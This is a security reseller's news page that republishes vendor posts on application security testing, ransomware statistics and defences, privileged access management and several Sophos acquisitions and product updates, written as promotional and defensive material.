Cyber Security Elements by NSS

News

27 Aug

Shifting left has been a buzzword in the application security space for several years now, and with good reason – making security an integral part of development is the only practical approach for modern agile workflows. But in their drive to build security testing into development as early as possible, many organizations are neglecting application security in later phases and losing sight of the big picture.

Shifting left: misunderstood, misapplied, and absolutely necessary

In the AppSec industry, we’ve been repeating the shift left mantra for years, saying over and over that the only way to ensure effective and efficient application security testing is to integrate it with the development process. While absolutely true, this includes one tiny yet critical assumption: that you are also doing application security testing on the right, i.e. in staging and production. What’s more, the very term “shift left” can be misunderstood as moving all security testing to development – and doing that can leave gaping holes in your security.

Let’s say you do extensive security testing during development, and you feel pretty confident that as they go into staging and production, your applications contain no significant vulnerabilities. But even if that is true (and that’s a big “if”), vulnerabilities might crop up after deployment due to configuration or version differences. New vulnerabilities may be discovered in your technology stack, whether in frameworks, libraries, or other components. New attack techniques may appear in the wild. And finally, your security testing will only cover new and updated code that goes through your left-shifted pipeline – existing sites and applications will be untouched by security testing, as will third-party products that are used in your organization.

There is no question that extending security testing tools and workflows to involve the developers is a must if security is to keep up with the pace of change enforced by agile development. In fact, we have a whole white paper about it. But checking new code for vulnerabilities is only one piece of the security puzzle – and to build the complete puzzle, you need a broader view.

Building an AppSec program that works

Professional web development is not easy. Developers already have their hands full making features work while keeping up with the latest technologies and meeting all the requirements and release deadlines. If you decide to shift security testing left by simply bolting on more test tools, you are piling even more tasks and alerts onto your overworked devs. Unless they are actionable, the extra alerts will only increase noise for little security benefit.

One way to deal with this while keeping sight of the big picture is to base your application security program around dynamic application security testing (DAST). Modern DAST solutions are accurate enough to provide useful feedback to developers but also versatile enough to operate in all stages of development, testing, and production. Invicti products also feature asset discovery, so you always know what you have and what you need to secure.

For Netsparker specifically, a crucial benefit is that with Proof-Based Scanning technology, you can provide developers with actionable reports about real, exploitable vulnerabilities, complete with best-practice remediation guidance. Using out-of-the-box integrations with popular issue trackers, you can even automatically create tickets in the tools your teams already use. And when the additional IAST module is deployed, vulnerability reports for developers can include details down to the specific line of code, making remediation much easier.

This completely changes the dynamics of application security testing. Instead of a flood of vague recommendations saying “this bit could be insecure, you may want to take a look,” developers get factual, actionable tickets in their favorite issue tracker. Instead of rewriting code to make the alert go away, they know that they are fixing a specific and exploitable vulnerability that malicious actors could use to attack the application. That way, the extra work done on security issues makes a real and measurable difference to your overall security posture.

Reducing and avoiding security debt

The idea of technical debt is well-known in the development world. You might have lots of code that depends on an outdated library, but the old library is still good enough. Updating all that code would mean lots of extra work and testing, so it always gets put off for later in favor of more urgent and valuable projects. This technical debt often accumulates until something breaks, and then you fix it because you really have to. Now apply this exact same concept to security, replacing “until something breaks” with “until you have a breach” – and you have your security debt.

For application security, this debt can accumulate on many levels, from using known vulnerable components to treating your web application firewall (WAF) as a long-term solution rather than a band-aid until a vulnerability fix is ready. You might even get recurring debt, where the same types of vulnerabilities keep coming up over and over again due to poor coding practices or insufficient remediation guidance. All this adds up until many organizations give up on systematically securing all their applications because no matter what they do, their security backlog keeps growing.

The only way to deal with security debt is to resolve security issues as you go rather than sweeping them under the carpet. To get there, you need to give your developers the tools and processes to fix vulnerabilities quickly and permanently. This is where the value of a DAST-centric shift-left program with a proof-based approach becomes evident. Focusing on actual weaknesses that could be exploited by attackers helps you continuously improve security and coding practices to prevent security issues from piling up.

Security is all about the big picture

Recent high-profile incidents are finally hammering home the message that in modern web security, there’s no such thing as an unimportant application. Attackers can pick their time and place even as the attack surface of applications (and organizations) continues to grow, spanning new and existing code, multiple web technology stacks, open-source libraries, third-party components, and more. To know your true security posture, you need to start with the big picture before drilling into specific vulnerabilities.

Modern vulnerability scanning solutions such as Netsparker by Invicti are highly accurate and can run full scans in a matter of hours and incremental scans in minutes. For existing applications, this allows you to scan your entire environment for vulnerabilities as often as you need – even daily if that’s what your security policy mandates. For security testing in the development pipeline, it means giving rapid and actionable feedback to developers who can then quickly and effectively fix security issues in their own code.

All the time, you have full visibility into your current security posture while also improving your long-term application security. And because you are working with reliable data, your security and development professionals are not wasting time on inefficient communication or misleading results.

This is shifting left done right.

Source: Netsparker

24 Aug

The retail sector became a top target for ransomware and data-theft extortion attacks during the pandemic, as revealed in Sophos’ State of Ransomware in Retail 2021 report. Based on an independent survey of 435 IT decision makers, it explores the extent and impact of ransomware attacks on mid-sized retail organizations worldwide during 2020.

Retail is at the ransomware frontline

The results show that retail, together with education, was the sector most hit by ransomware in 2020, with 44% of organizations hit (compared to 37% across all industry sectors). Over half (54%) of the retail organizations hit by ransomware said the attackers had succeeded in encrypting their data.

Cybercriminals were quick to exploit opportunities presented by the pandemic, which in the retail sector was primarily the rapid growth in online transactions. While IT teams were busy enabling and managing this change (nearly three quarters of respondents, 72%, said their cybersecurity workload increased over 2020), adversaries targeted them with ransomware attacks.

A target for extortion-only attacks

The survey also found that retail organizations were particularly vulnerable to a small but growing new trend: extortion-only attacks, where the ransomware operators don’t encrypt files but threaten to leak stolen information online if a ransom demand isn’t paid. More than one in ten (12%) retail ransomware victims experienced this, nearly double the cross-sector average, and only central government (13%) was more affected.

“The comparatively high percentage of retail organizations hit with data-theft based extortion attacks is not entirely surprising. Service industries such as retail hold information that is often subject to strict data protection laws, and attackers are only too willing to exploit a victim’s fear of fallout from a data breach in terms of fines and damage to brand reputation, sales and customer trust,” said Chester Wisniewski, principal research scientist at Sophos.

A third of retail organizations pay the ransom

32% of retail organizations whose data was encrypted paid the ransom to get their data back. The average ransom payment was US$147,811 – lower than the global average of US$170,404. While these are large sums, paying the ransom is just a small part of the overall costs of dealing with a ransomware attack. The total bill for rectifying a ransomware attack in the retail sector (considering downtime, people time, device cost, network cost, lost opportunity, ransom paid, and more) came in at US$1.97 million on average – above the cross-sector average of US$1.85 million.

Paying up doesn’t pay off

Many people assume, understandably, that once you pay the ransom you get all your data back. The survey has revealed that this is not the case. Within the retail sector, those who paid got back on average only two-thirds (67%) of their data, leaving a third inaccessible; and just 9% got all their encrypted data back. This emphasises the vital importance of having backups from which you can restore in the event of an attack.

The silver lining

Fortunately, it’s not all bad news: the retail sector was the most likely to report that its IT teams were able to enhance their cybersecurity skills and knowledge over the course of 2020. While adapting to the pandemic and the increase in online trading created a considerable workload, it also provided new learning opportunities that they can take with them into the year ahead.

Read the full report

To learn more about the impact of ransomware on the retail sector around the globe, read the full State of Ransomware in Retail 2021 report.

Source: Sophos

19 Aug

To maintain the best possible security stance and protect your sensitive data against cyberattacks, you cannot just rely on security products alone. Here is a list of seven key elements that we believe should be considered in your web app security strategy.

1. Include everyone in security practices

Some businesses still believe that security should only be the concern of a specialized team. In the current business environment, such an approach is not viable:

  • The increasing cybersecurity skills gap means that security teams are unable to keep up with business growth.
  • A dedicated security team becomes a bottleneck in the development processes.
  • If security is reactive, not proactive, there are more issues for the security team to handle.

The current best practice for building secure software is called SecDevOps. This approach, which goes further than DevSecOps, assumes that every person involved in web application development (and any other application development) is in some way responsible for security. Developers know how to write secure code. QA engineers know how to apply security policies to their tests. All the management and executives have security in mind when making key decisions.

An effective secure DevOps approach requires a lot of education. Everyone must be aware of the security threats and risks, understand potential application vulnerabilities, and feel responsible for security. While this requires a lot of time and effort, the investment pays off with top-notch secure applications.

2. Adopt a cybersecurity framework

Cybersecurity is very complex and requires a well-organized approach. It’s easy to forget about certain aspects and just as easy to fall into chaos. That is why many organizations base their security strategy on a selected cybersecurity framework.

A cybersecurity framework is a strategic approach that begins with detailed research on security risks and includes activities such as developing a cyber incident response plan along with suitable application security checklists. The bigger the organization, the more such a strategic approach is needed.

Another advantage of adopting a cybersecurity framework is the realization that all cybersecurity is interconnected and web security cannot be treated as a separate problem.

3. Automate and integrate security tools

In the past, security teams performed application security testing manually using dedicated security solutions. For example, a security researcher would first use a simple vulnerability scanner and then manually perform additional penetration testing using open-source tools. However, in the current security landscape, such an approach is not optimal. Just like in the whole IT industry, the most efficient IT security processes are based on automation and integration.

Many security tools are now developed with such automation and integration in mind. For example, business-grade vulnerability scanners are intended to be integrated with other systems such as CI/CD platforms and issue trackers. There are several advantages to such an approach:

  • The less manual work, the less room for error. If security processes are automated and integrated, nobody can, for example, forget about scanning a web application before it is published.
  • If security is integrated into the software development lifecycle (SDLC), issues can be found and eliminated much earlier. This saves a lot of time and makes remediation much easier.
  • If security tools work together with other solutions used in software development, such as issue trackers, security issues can be treated the same as any other issue. Engineers and managers don’t lose time learning and using separate tools for security purposes.

4. Follow secure software development practices

There are two key aspects to secure software development:

  1. Practices that help you make fewer errors when writing application code
  2. Practices that help you detect and eliminate errors earlier

In the first case, software developers must be educated about potential security problems. They must understand SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), and other vulnerabilities and misconfigurations such as the ones listed in the OWASP Top 10. They must also know the secure coding techniques required to prevent such vulnerabilities; for example, they must know how to prevent SQL injections.

In the second case, what helps most is scanning for security vulnerabilities as early as possible in the development lifecycle. If you integrate security tools into your DevOps pipelines, as soon as the developer commits new or updated functionality, they are informed about any vulnerabilities in it. Because this is done immediately, it also makes such vulnerabilities much easier to fix because the developer still remembers the code that they were working on. It also guarantees that the developer can correct their own code, and not waste time trying to understand code written by someone else a long time ago.

5. Use diverse security measures

There are many aspects of web security, and no single tool can be perceived as the only measure that will guarantee complete safety. The key tool for web application security is the vulnerability scanner. However, even the best vulnerability scanner will not be able to discover all vulnerabilities (such as logical errors) or bypass complex access control and authentication schemes without human intervention.

Vulnerability scanning must not be treated as a replacement for penetration testing. Also, to fully secure web servers, vulnerability scanning must be combined with network scanning. Luckily, some vulnerability scanners are integrated with network security scanners, so the two activities may be handled together.

In addition to vulnerability scanners that are based on DAST or IAST technologies, many businesses additionally choose to use a SAST (source code analysis) tool at early stages, for example in the SecDevOps pipelines or even earlier, on developer machines. Such a tool is a very useful addition, but because of its limitations (such as the inability to secure third-party elements), it cannot replace a DAST tool.

Some businesses believe that the best way to protect against web-related threats is to use a web application firewall (WAF). However, a WAF is just a band-aid tool that eliminates potential attack vectors. While a WAF is an important part of a complete security suite for an enterprise and the best way to handle zero-day vulnerabilities through virtual patching, it should not be treated as the most important line of defense.

All in all, you should use diverse security measures, but you should not just believe that purchasing them and giving them to your security team will solve the problem. These security measures must be integrated with your entire environment and automated as much as possible. They are there to reduce the amount of work that the security team has, not increase it.

6. Perform security exercises

One of the best ways to check if your sensitive information is safe is to perform mock attacks. This is the key assumption behind penetration testing but penetration tests are just spot-checks. To fully and continuously evaluate your security stance, the best way is to perform continuous security exercises such as red team vs. blue team campaigns.

The idea behind red teaming is to hire an external organization that continuously tries to challenge your security and to establish a local team that is in charge of stopping such attempts. There are many advantages to this approach. A continuous exercise means that your business is always prepared for an attack. It also helps with maintaining general security awareness, since the blue team involves much more than just a dedicated security team.

A dedicated red team does not just exploit security vulnerabilities. They often perform different types of mock attacks (including phishing, social engineering, DDoS attacks, and others) to help you protect against real ones. The added advantage is also the realization of how different security elements are woven together and cannot be treated separately.

7. Maintain a bounty program

Many top-notch security professionals prefer to work as freelancers instead of being hired by businesses either full-time or on a project basis. Losing out on such outstanding expertise is a huge waste. Your business can use such valuable resources by establishing a bounty program.

While some businesses may perceive a bounty program as a risky investment, it quickly pays off. It also increases the respect that your brand has in the hacking community and, consequently, the general brand perception. If you have a bounty program and treat independent security experts fairly, your brand is perceived as mature and proud of its security stance. You may strengthen this perception by publicly disclosing bounty program payouts and responsibly sharing information about any security vulnerability discoveries and data breaches.

Source: Acunetix

17 Aug

Optimizing Managed Threat Response (MTR) and Extended Detection and Response (XDR) with Security Orchestration Automation and Response (SOAR) Capabilities.

“I’m excited to share that Sophos has acquired Refactr, which develops and markets a versatile DevSecOps automation platform that bridges the gap between DevOps and cybersecurity,” said John Levy, Sophos Chief Technical Officer.

As DevOps and security teams continue to adopt “IT-as-Code” approaches to managing their environments, Refactr’s ability to automate any of these processes enables teams to scale. Refactr has leading customers in both the private and government/public sectors, including the Center for Internet Security, and the US Air Force’s Platform One.

Sophos is optimizing Refactr’s DevSecOps automation platform to add Security Orchestration Automation and Response (SOAR) capabilities to our Managed Threat Response (MTR) and Extended Detection and Response (XDR) solutions. The SOAR capabilities will also help automate Sophos’ Adaptive Cybersecurity Ecosystem, which underpins all of Sophos’ product solutions, services, and alliance integrations.

First-generation SOAR solutions have moved our industry forward in significant ways, but we’re now witnessing an evolution where more and more businesses are becoming software companies, and our security solutions need to evolve in parallel. As we’ve seen in recent supply-chain incidents, attackers are increasingly targeting software development pipelines, and defenders need the ability to shift further left of attackers. The industry needs SOAR to mature into more capable and generalizable DevSecOps solutions, and Sophos’ acquisition of Refactr will help us lead the way.

With Refactr, Sophos will fast track the integration of such advanced SOAR capabilities into our Adaptive Cybersecurity Ecosystem, the basis for our XDR product and MTR service. We will provide a full spectrum of automated playbooks and pipelines for our customers and partners, from drag-and-drop to fully programmable, along with broad integrations with third-party solutions through our technology alliances program to work with today’s diverse IT environments.

Sophos will continue to develop and offer Refactr’s platform to their existing and growing base of partners and organizations that want to build customized IT and security automations for themselves and for their customers. Refactr’s Community Edition will continue to be available as well.

“We created the Refactr platform so that every organization can achieve DevSecOps through holistic security-first automation. Our platform was purpose-built to be versatile, interoperable and easy to use. We are proud of what we accomplished at Refactr and excited for the next part of our journey with Sophos to help create a more secure world through DevSecOps,” said Michael Fraser, CEO and co-founder, Refactr.

We could not be more excited to add Refactr technologies to the Sophos portfolio and we plan to begin offering SOAR options by early 2022. In the meantime, on behalf of Sophos, I would like to extend a very warm welcome to Refactr employees, customers, and partners.

Source: Sophos

12 Aug

I’m thrilled to announce that Sophos has acquired Braintrace, an innovator in Network Detection and Response (NDR) technology. Braintrace’s NDR provides deep visibility into network traffic patterns, including encrypted traffic, without the need for Man-in-the-Middle (MitM) decryption.

Braintrace’s NDR technology will enhance and extend Sophos’ Managed Threat Response (MTR), Rapid Response, and Extended Detection and Response (XDR) solutions through integration into the Adaptive Cybersecurity Ecosystem, which underpins all Sophos products and services. With the integration of Braintrace, defenders will benefit from an ‘air traffic control system’ that sees all network activity, reveals unknown and unprotected assets, and exposes evasive malware more reliably than Intrusion Protection Systems (IPS).

We’re particularly excited that Braintrace built this technology specifically to provide better security outcomes to their Managed Detection and Response (MDR) customers. It’s hard to beat the effectiveness of solutions built by teams of skilled practitioners and developers to solve real world cybersecurity problems.

The Braintrace technology will also serve as the launchpad to collect and forward third-party event data from firewalls, proxies, virtual private networks (VPNs), and other sources. These additional layers of visibility and event ingestion will significantly improve threat detection, threat hunting and response to suspicious activity.

Sophos will deploy Braintrace’s NDR technology as a virtual machine, fed from traditional observability points such as a Switched Port Analyzer (SPAN) port or a network Test Access Point (TAP), to inspect both north-south traffic at boundaries and east-west traffic within networks. These deployments help discover threats inside any type of network, including those that remain encrypted, serving as a complement to the decryption capabilities of Sophos Firewall. As a virtual machine, Braintrace’s NDR technology can run both on-premises and in the cloud to protect your network.

The technology’s packet and flow engine feeds a variety of machine learning models trained to detect suspicious or malicious network patterns, such as connections to Command and Control (C2) servers, lateral movement and communications with suspicious domains. Since Braintrace built its NDR technology specifically for predictive, passive monitoring, its engine also provides intelligent network packet capture that IT security administrators and threat hunters can use as supporting evidence during investigations. The novel NDR analysis and prediction technique is patent pending.

“We built Braintrace’s NDR technology from the ground up for detection and now, with Sophos, it will fit into a complete system to provide cross-product detection and response across a multi-vendor ecosystem,” said Bret Laughlin, CEO and co-founder, Braintrace.

Sophos plans to introduce Braintrace’s NDR technology for MTR and XDR in the first half of 2022. In the meantime, on behalf of Sophos, I would like to extend a warm welcome to all Braintrace customers, partners and employees.

Source: Sophos

10 Aug

  1. On the market for over 10 years
  2. More than 80,000 satisfied customers around the globe already use MailStore Server
  3. Supports Microsoft Exchange Server, Microsoft 365, and many other email systems
  4. Supports journal archiving and mailbox archiving
  5. Fast and easy access for end users, even on mobile devices such as tablets and smartphones
  6. Versatile export function guarantees independence in the long term, even from MailStore
  7. Free 30-day trial version available at any time
  8. Prices start from 295.00 €, incl. a 12-month Update & Support Service

Ok, that was a blatant portion of aggressive advertising, sorry for that! But seriously, we believe that for any happy Exclaimer Mail Archiver user, MailStore Server is a very good and suitable alternative.

Well, Here Are a Few Good Options to Find Out if MailStore Server Is the Right Email Archiving Product for Your Needs:

  1. Read the recent product review done by Microsoft MVP Brien Posey on www.techgenix.com
  2. Watch our product videos and helpful tech tip videos, as these brief ‘knowledge nuggets’ give you a great technical insight into MailStore Server
  3. Join one of our regular webinars and enjoy a product live demo
  4. Give it a try and download our free 30-day-trial
  5. Need to tick more boxes on your list of technical requirements? Our technical support is happy to fill the blanks.

Source: MailStore

6 Aug

The 2021 Gartner Magic Quadrant for Privileged Access Management has been published, and BeyondTrust is pleased to announce that we have been named a Leader for the third time in a row! According to the research report, “Gartner defines the privileged access management (PAM) market as a foundational security technology to protect accounts, credentials and operations that offer an elevated (“privileged”) level of access.”

This year’s edition of the Magic Quadrant provides an assessment of 10 PAM vendors. Organizations are evaluated across completeness of vision and ability to execute, with the report drilling down across dozens of criteria. You can download a complimentary copy here.

Read on for more highlights and analysis of the report.

In this year’s report, Gartner sees the PAM market as comprising the following three distinct tool categories:

  • “Privileged account and session management (PASM)
  • Privilege elevation and delegation management (PEDM)
  • Secrets management”

Gartner calls out the following as the core capabilities of PAM:

  • “Discovery of privileged accounts across multiple systems, infrastructure, and applications
  • Credential management for privileged accounts
  • Delegation of access to privileged accounts
  • Session establishment, management, monitoring and recording for interactive
  • Controlled elevation of commands”

According to Gartner, these are optional PAM capabilities:

  • “Secrets management for applications, service, and devices
  • Privileged task automation (PTA)
  • Remote privileged access for workforce and external users”

Let’s take a closer look at 3 key trends.

1. PAM continues to be a high priority for security organizations: Gartner states, “The growth is mainly driven by the increasing awareness among security staff regarding criticality of PAM solutions. Several high-profile breaches have been linked to compromised privileged account credentials. Coupled with this, the accelerated migration to cloud, blurring enterprise security perimeters and the overall increase in the number of cyberattacks all contribute to the growth of PAM adoption.”

This aligns with what we’ve seen at BeyondTrust over the past year as organizations continue to adopt and evolve their PAM solutions beyond basic PASM products to include PEDM, Secrets Management, and Privileged Remote Access solutions. We believe BeyondTrust offers the broadest PAM portfolio on the market, with particular strength in PEDM for Windows, Mac, Unix, and Linux.

2. Remote access security becomes increasingly important amid the pandemic. In its companion Critical Capabilities for Privileged Access Management report, Gartner states, “In response to global shutdowns, many privileged access management (PAM) vendors jumped into the remote access business, bringing new products to the market last year, with many focused on remote privileged access.”

Organizations recognize remote access security is a must-have in the new normal of work-from-anywhere (WFA), hybrid work, and accelerated digital transformation. BeyondTrust trailblazed and continues to lead in Secure Remote Access solutions, comprised of mature Privileged Remote Access and Remote Support products, that are years ahead of other PAM vendors in terms of depth and breadth of capabilities.

3. Operational Technology (OT) security in the spotlight: In the PAM Magic Quadrant, Gartner also called out the growing need and demand for extending privileged access management to OT environments. Gartner stated, “Although PAM is typically a horizontal solution, with increasing demand from healthcare, manufacturing and natural resources, an emerging need from a vertical standpoint is for specific features for organizations using the IoT and OT. Examples include companies in the utilities and energy sectors, and hospitals. These organizations need to secure privileged access to their supervisory control and data acquisition (SCADA) and OT devices, and require preconfigured connectors to popular OT systems.”

2021 has already been characterized by some brazen OT attacks, such as the Colonial Pipeline ransomware attack, and the water poisoning attempt on a Florida water treatment facility. BeyondTrust PAM provides a blended approach that could have prevented and mitigated these attacks and others by securing remote access pathways, proactively managing privileged credentials and secrets, and applying least privilege and pragmatic application control across all endpoints and privileged sessions. Over the past year, BeyondTrust has seen a substantive increase in customers adopting and applying our solutions for OT use cases.

The Gartner Magic Quadrant and BeyondTrust PAM

The 2021 Gartner Magic Quadrant for Privileged Access Management recognizes BeyondTrust as a Leader for both our ability to execute and completeness of vision.

In our view, the 2021 Gartner Magic Quadrant for Privileged Access Management validates BeyondTrust’s strengths in the PAM market, including platform breadth, solution depth, integrations, value, and time-to-value. We believe BeyondTrust provides the most complete and integrated solution across the three PAM tool categories recognized by Gartner, as well as delivering deep capabilities across the “core” and “optional” PAM capabilities described in the Gartner report. We invite you to download a complimentary copy of the PAM Magic Quadrant and compare us against the rest of the vendors.

Here are what we believe to be nine differentiators of BeyondTrust PAM:

  1. Breadth & depth – Unlike most competitors, we deliver deep capabilities across the broadest universe of privileges – whether it’s across Windows, Unix, Linux, macOS, cloud, on-premise, employee, vendor, human, or machine.
  2. Ease of deployment and scalability – our customers make leaps in risk reduction and operational/administrative improvements, fast.
  3. Superb account discovery that helps illuminate shadow IT and bring all privileged assets and privileges under control.
  4. Privilege elevation and delegation (PEDM) features and platform breadth. We believe our PEDM product, called Endpoint Privilege Management, is unparalleled in the space for enforcing least privilege and implementing advanced application control capabilities, such as the Trusted Application Protection capability, which can even protect against fileless attacks. Our product also provides file integrity monitoring for Unix and Linux environments.
  5. Mature, secure remote access capabilities for supporting internal and third-party users, and locking down access to sensitive assets, such as cloud/DevOps/virtual control planes and other applications.
  6. Robust out-of-the-box and customizable analytics and reporting.
  7. Flexible deployment options – choose cloud, hybrid, or on-prem—we support what works best for each of our customers! Many PAM providers offer cloud or on-prem products only.
  8. A true, integrated PAM platform, with the ability to unlock powerful synergies when multiple BeyondTrust products/solutions are deployed.
  9. A clear roadmap of PAM innovations.

The PAM Magic Quadrant: Today & Beyond

While the Gartner Magic Quadrant offers independent, expert-researched snapshots of the vendor market and PAM landscape, BeyondTrust’s innovation is continuous and relentless. Since the report’s March 2021 product release cut-off date, BeyondTrust has announced several significant product releases, including:

  • Cloud Privilege Broker: New solution in CIEM (Cloud Infrastructure Entitlement Management) centralizes visualization and management of entitlements, enabling IT and security teams to apply consistent policies across multicloud environments.
  • DevOps Secrets Safe 21.1: Latest version adds integrations and enhances just-in-time access controls, enabling service accounts to be automatically removed from the cloud infrastructure when a ‘time-to-live’ duration is reached, significantly reducing a potential attack vector.
  • Password Safe 21.1: New version extends and simplifies privileged credential management to more platforms and offers enhanced integration with BeyondTrust Privilege Management for Windows and Mac.
  • Privilege Management for Windows & Mac Cloud 21.5: Latest cloud-based version of the product provides an integration with ServiceNow to streamline workflows for IT-related tickets and privilege elevation requests. This release also enhances reputation-based analytics to further boost malware protection.
  • Privileged Remote Access Version 21.1: Latest version delivers a number of improvements, including simplified vendor onboarding features, credential vault enhancements, Raspberry Pi capabilities, extended unattended support use cases, and more.

In addition, BeyondTrust continues to rack up important certifications, demonstrating how our solution and organization go above and beyond.

  • ISO 27701 Certification: On June 3rd, 2021, BeyondTrust announced successful completion of the International Organization for Standardization (ISO) 27701 certification for our entire product portfolio for both on-premises and cloud products. Just seven months after achieving ISO 27001 certification, this additional certification demonstrates BeyondTrust’s ongoing commitment to ensure customer data is safe from the most sophisticated methods of intrusion.
  • Remote Access Solutions Awarded Level 1 FIPS 140-2 Validation: On April 14th, BeyondTrust announced it had been awarded Level 1 Federal Information Processing Standards (FIPS) 140-2 validation for its Privileged Remote Access product. BeyondTrust now has FIPS 140-2 Level 1 validation for both of our Secure Remote Access solutions: a first-time validation for Privileged Remote Access and a renewed validation for Remote Support. BeyondTrust has the only Secure Remote Access solution that meets the rigorous requirements of FIPS 140-2 Level 1, a substantive differentiator in a world that is increasingly moving to hybrid or remote-first workforces.

2021 has been another highly disruptive year, yet BeyondTrust solutions are experiencing record demand to keep our world’s businesses and economies running. We have helped thousands of companies securely adjust to the new priorities and dynamic, shifting work environment since the start of the pandemic.

BeyondTrust PAM solutions work in an integrated way to unify control over your entire privilege universe and drastically reduce your attack surface. We believe our ability to secure every privileged user (human, machine, vendor, employee), asset, and session via our PAM platform poises us as the best PAM solutions provider to partner with as organizations navigate the new normal, and the multiplying planes of privileges.

3

Aug

In a move that highlights Sophos’ channel-best commitment, global analyst research firm Canalys named Sophos a Champion in its 2021 Cybersecurity Leadership Matrix

Canalys evaluated 17 global cybersecurity vendors for its 2021 Cybersecurity Leadership Matrix, reserving the Champion designation for an exclusive group of vendors with the highest channel scores and a demonstrated commitment to delivering high-performing channel programs. 

“Sophos had the highest rise in partner ratings among the cybersecurity vendors analyzed this year, elevating its status to Champion,” said Canalys Chief Analyst, Matthew Ball. “The launch of its new Global Partner Program and its continued focus on accelerating growth with MSPs have contributed to its strong partner feedback.” 

The Cybersecurity Leadership Matrix assesses vendor performance in the channel, based on channel feedback via the Candefero Vendor Benchmark over the last 12 months, and an independent analysis of vendors, assessing vision and strategy, portfolio competitiveness, customer coverage, channel business, M&A activities, new product launches, recent channel initiatives launched and future channel initiatives planned. The Candefero Vendor Benchmark tracks leading technology vendors around the world, collating the experiences that channel partners have when working with different vendors. Channel partners are asked to rate their vendors across the 10 most important areas of channel management. 

“This is a fantastic achievement and an honor to be recognized by the partner community as a vendor that’s delivering a best-in-class partner program that adapts to the unique needs of today’s next-gen resellers, managed service providers, and cybersecurity experts,” said Kendra Krause, Senior Vice President of Global Channels at Sophos. “Canalys notes that Champions show a willingness to boost growth opportunities and increase profitability for partners and this is absolutely the channel-best commitment we deliver at Sophos.”

More information on the Canalys Global Cybersecurity Leadership Matrix and Sophos’ Champions status can be found here. 

Source: Sophos

28

Jul

Ransomware attacks have all but dominated news headlines in recent weeks. Managed service providers (MSPs) know the risks of ransomware and how important it is to have a plan in place to respond to an attack when they have an impacted client. There are many different factors to consider, but it’s best practice to have a strategy for detection, prevention, and response. We put together a comprehensive infographic on the journey of ransomware and how MSPs can prepare their clients – here’s a preview.

How Can MSPs Prevent Ransomware Attacks?

The reality is, there is no foolproof way to prevent a ransomware attack. Even the most protected and prepared businesses can fall victim to ransomware. However, MSPs can take steps to lower the chances of their SMB clients falling victim to an attack.

  • Arm clients with antivirus. These tools have been around a long time but are still critical in a ransomware prevention strategy.
  • Automate patch management. When software providers identify bugs, they publish that info and offer a patch. With automated patching, businesses are less susceptible to being exploited by bad actors looking to capitalize on those bugs.
  • Implement tools with ransomware detection capabilities. Often, ransomware attacks can infiltrate a business’s systems, going undetected. One way to drastically improve ransomware prevention is to have tools that identify it before it spreads across a network.

The Journey of Crypto-Ransomware: Detection, Response, and Prevention

In this infographic, we break down how ransomware is spread and share tips to help businesses establish plans to prevent, detect, and respond to ransomware attacks.


Detecting a Ransomware Attack

Ransomware attacks can go undetected, but there are ways to identify if a hacker may have impacted your client. Be sure your clients notify you if they see unusual changes to file names, lockout screens, or a pop-up with a ransom note.

Responding to a Ransomware Attack

If a ransomware attack is detected, it’s important to respond as quickly as possible. First, scan networks to confirm that an attack is underway, and once identified, isolate the infected computer(s) immediately. Next, secure backup data or systems by taking them offline and ensure backups are free of malware. These are the immediate steps to take when alerted to an attack. From here, MSPs should focus on ensuring hackers can’t get back in.

These are just a few ways to prepare for a ransomware attack and are certainly not a comprehensive list. To learn more about how MSPs can help prevent their SMB clients from falling victim to a ransomware attack, take a look at our infographic, The Journey of Crypto-Ransomware: Detection, Response, and Prevention.

Source: Datto

23

Jul

The product team is pleased to announce the early access program for SFOS v18.5 MR1 for all Sophos (XG) Firewall devices and all SFOS form factors – XGS Series, XG Series, virtual and software appliances, as well as all supported cloud platforms.

SFOS v18.5 MR1 includes support for new Sophos Central Orchestration capabilities and a number of important security fixes and enhancements.

What’s new in v18.5 MR1

Support for new Central Orchestration subscription (included in the new Xstream Protection license bundle):

  • Central SD-WAN VPN Orchestration enables easy point-and-click site-to-site VPN orchestration from Sophos Central – automatically configuring the necessary tunnels and firewall access rules for your desired SD-WAN overlay network.
  • Central Firewall Reporting Advanced with 30 days of data retention for full multi-firewall reporting in Sophos Central with access to all pre-packaged reports, plus flexible custom report capabilities and the option to save, schedule, or export your reports.
  • Sophos MTR/XDR connector to enable Sophos Firewall intelligence and data to be used as part of our 24/7 Managed Threat Response service, or as part of your self-managed, cross-product extended detection and response solution.

Get the full details on Central Orchestration and how to take advantage of it.

Additional enhancements:

  • Resolved FragAttack vulnerabilities recently discovered in the Wi-Fi specification for all internal and add-on Wi-Fi modules for Sophos (XG) Firewall desktop series appliances. All other updates will follow as outlined in this advisory.
  • Enhanced backup/restore support improves backup/restore operations across different models by better mapping the management ports. v18.5 MR1 can also restore backups from v18 MR5 and earlier, including any older v17.5 MRs.
  • XGS Series reset button enables a long press of the hardware reset button on XGS Series appliances (XGS 116 and higher models) to perform a factory reset to help recover from a bad configuration.
  • VPN tunnel logging adds improved logging of VPN tunnel flap events and IPsec IKEv2 rekeying.
  • Sophos DDNS (myfirewall.com) will be discontinued and no longer supports new registrations. This is planned from January 31, 2022. Refer to KBA-41764 for more details.

How to get early access and provide feedback

This release is available for early access to all Sophos (XG) Firewall devices: XGS Series, XG Series, virtual, cloud, and all supported platforms running SFOS.

Get the full details and download links here.

You can provide early access feedback directly to the product team using the new and improved in-product feedback mechanism introduced with v18.5. Simply click the feedback link at the top right of the web console UI. Alternatively, you can provide your feedback via the community.

This release is expected to be generally available and rolled out automatically to all customer devices starting in early August.

Source: Sophos

19

Jul

Sophos acquired Capsule8. “I’m excited to share that Sophos has acquired Capsule8, a pioneer and market leader of runtime visibility, detection and response for Linux production servers and containers covering both on-premises and cloud workloads” said , Chief Product Officer at Sophos.

Sophos already protects more than two million servers for over 85,000 customers worldwide. Comprehensive server protection is a crucial component of any effective cybersecurity strategy. This deal expands our portfolio of Detection and Response Solutions and Services for underprotected server and cloud environments. It’s great news for anyone looking for a strong and lightweight layer of Linux security with strategically important visibility and detection for their servers and containers, and for organizations who want a single vendor for end-user compute and server workloads.

Linux servers: A growing vector of attack

Use of cloud platforms has grown considerably over recent years, and the pandemic further accelerated the move from on-premises servers to cloud-based server workloads. With Linux now the dominant operating system for server workloads, it’s easy to understand why adversaries are adapting and customizing their approach to attack these systems.

SophosLabs threat intelligence reveals that adversaries are designing tactics, techniques and procedures (TTPs) aimed specifically at Linux systems, often exploiting server software as the initial entry point in their attack. Having a strong layer of Linux security is essential in defending against these attacks.

Extending Sophos protection

